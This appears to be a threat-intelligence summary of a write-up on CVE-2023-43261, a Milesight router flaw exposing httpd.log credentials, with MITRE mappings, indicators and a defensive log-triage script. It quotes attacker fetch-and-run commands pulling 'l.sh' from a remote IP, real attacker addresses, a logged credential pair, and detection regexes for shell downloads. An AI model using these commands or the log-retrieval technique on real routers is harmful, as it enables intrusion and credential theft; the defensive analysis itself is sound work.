CVE-2023-43261 likely saw in-the-wild exploitation of Milesight industrial cellular routers, but not at scale, and the CVE description itself is incomplete and sometimes inaccurate. A real-world write-up shows the flaw allowed remote access to the router’s web interface and credential leakage, yet most affected devices have been patched for years. #Milesight #CVE-2023-43261 #IndustrialRouters #ICS #DarkIoT
Key points
- The CVE-2023-43261 vulnerability affected Milesight UR series routers and involves information disclosure via the httpd.log exposed to remote unauthenticated access.
- The CVE description is inconsistent, misidentifying affected models and firmware versions; patched firmware versions have existed for years, but the documentation was wrong.
- The vulnerability enables attackers to retrieve credentials logged by the router (web, VPN, wireless keys, DDNS, etc.), potentially enabling pivot to ICS networks.
- An unauthenticated /islogin endpoint reveals model and version, aiding fingerprinting and targeted attempts.
- Real-world activity shows limited, non-mass exploitation: several login attempts from various IPs, with some first-attempt successes using credentials found in httpd.log.
- Despite patching, small-scale exploitation and credential exposure were observed, and defenders are advised to reset credentials and restrict internet exposure of these routers.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The router exposes httpd.log to remote unauthenticated attackers via the web interface. [‘the router exposes its httpd.log to remote and unauthenticated attackers via the web interface.’]
- [T1082] System Information Discovery – The router responds to an unauthenticated HTTP request to /islogin with a detailed description of the model and version. [‘The router responds to an unauthenticated HTTP request to /islogin with a detailed description of the model and version.’]
- [T1552.001] Credentials In Files – The device logs web credentials, VPN credentials, wireless keys, and other sensitive data in httpd.log. [‘web credentials, vpn credentials, wireless keys, ddns credentials, etc.’]
- [T1133] External Remote Services – VPN configuration on the router can be misused to pivot into the ICS network. [‘the router logs a lot of things it shouldn’t… and the web interface allows the user to configure vpn servers and drop firewall protections… so once you have credentials, it’s fairly easy to access the ICS network from the internet.’]
- [T1562.004] Impair Defenses: Modify Firewall – Attacker activity includes opening up or weakening firewall protections via VPN configurations. [‘opening up the firewall (this is 200.73.18.40 going after a system in Canada)’]
- [T1059] Command and Scripting Interpreter – Use of the l.sh script downloaded from a remote host as part of the exploitation chain. [‘wget+http://194.180.48[.]100/l.sh’; ‘curl+-O+http://194.180.48[.]100/l.sh’; ‘sh+l.sh’]
Indicators of Compromise
- [IP Address] context – login attempts from internet-facing systems observed; examples include 5.61.39.232, 200.73.18.40, and 103.83.144.161 (France, Lithuania, Norway geolocations) indicating credentialed access attempts; 103.83.144.161 and 5.61.39.232 also appear in the logged attempts
- [URL] context – a notable example where a script was retrieved: http://194.180.48[.]100/l.sh
- [File] context – httpd.log contains credentials (web, VPN, wireless, DDNS) and is referenced in logs
- [File] context – l.sh referenced in the exploit chain (downloaded/used via curl/wget)
- [Credential] context – example credential pair shown in logs: {"username":"admin","password":"rIuWTTKEjXPXY3oAN7V2kQ=="}
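The indicators above come together in a defender-side triage of the router's own httpd.log: the two things worth flagging in an exported log are leaked credential bodies (the key point of the flaw) and the URL-encoded shell-download strings quoted under T1059. The script below is an added example written for this summary; it is not code from the VulnCheck write-up or from Milesight. The log line layout (timestamp, client IP, method, path, body) and the sample lines are constructed assumptions, since the post does not document the real format; the regex must be adjusted to the actual export before use.

```python
"""
Added example (not from the VulnCheck post or Milesight): triage an exported
Milesight httpd.log for (1) credential material logged in request bodies and
(2) URL-encoded shell-download fragments such as "wget+http://.../l.sh".
ASSUMPTION: a "timestamp client_ip METHOD path body" line layout.
"""
import json
import re
from collections import defaultdict

# Constructed sample lines in the ASSUMED layout (RFC 5737 documentation IPs).
SAMPLE_LOG = """\
2023-10-02 11:02:13 203.0.113.10 GET /islogin -
2023-10-02 11:02:14 203.0.113.10 POST /login {"username":"admin","password":"EXAMPLE_ENCODED_PW=="}
2023-10-02 11:05:40 198.51.100.7 GET /cgi?cmd=wget+http://198.51.100.200/l.sh -
2023-10-02 11:05:41 198.51.100.7 GET /cgi?cmd=sh+l.sh -
2023-10-02 11:09:00 192.0.2.44 GET /index.html -
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) (?P<body>.*)$"
)
# JSON login body with a username/password pair, as seen in the leaked log.
CRED_RE = re.compile(r'"username"\s*:\s*"([^"]*)"\s*,\s*"password"\s*:\s*"([^"]*)"')
# URL-encoded fetch-and-run fragments of the kind quoted in the post.
SHELL_RE = re.compile(r"(?:wget|curl)\+(?:-O\+)?https?://[^\s&]+|\bsh\+[\w.-]+\.sh\b")


def parse_line(line):
    """Return the line's fields as a dict, or None if it does not fit the layout."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def triage(log_text):
    """Scan log text; report credential leaks and shell-download indicators per IP."""
    findings = {"credential_leaks": [], "shell_downloads": [], "per_ip": defaultdict(list)}
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue
        cred = CRED_RE.search(rec["body"])
        if cred:
            # Record only the username; never copy the secret into the report.
            findings["credential_leaks"].append(
                {"ip": rec["ip"], "user": cred.group(1), "ts": rec["ts"]})
            findings["per_ip"][rec["ip"]].append("credential_in_log")
        hit = SHELL_RE.search(rec["path"] + " " + rec["body"])
        if hit:
            findings["shell_downloads"].append(
                {"ip": rec["ip"], "indicator": hit.group(0), "ts": rec["ts"]})
            findings["per_ip"][rec["ip"]].append("shell_download")
    findings["per_ip"] = dict(findings["per_ip"])
    return findings


def recommend(findings):
    """Map findings to the remediation steps the post advises."""
    actions = []
    if findings["credential_leaks"]:
        actions.append("rotate web, VPN, wireless and DDNS credentials; treat them as exposed")
    if findings["shell_downloads"]:
        actions.append("treat the router as compromised: reimage/upgrade firmware and review VPN and firewall config")
    if findings["credential_leaks"] or findings["shell_downloads"]:
        actions.append("remove the web interface from direct internet exposure")
    return actions


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print(json.dumps(result, indent=2))
    for step in recommend(result):
        print("-", step)
```

Run it against a log exported from the device (or captured from the exposed endpoint during incident response) by replacing `SAMPLE_LOG` with the file contents; the per-IP view lets you line up the source addresses with the login attempts in the "Indicators of Compromise" list above.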
Read more: https://vulncheck.com/blog/real-world-cve-2023-43261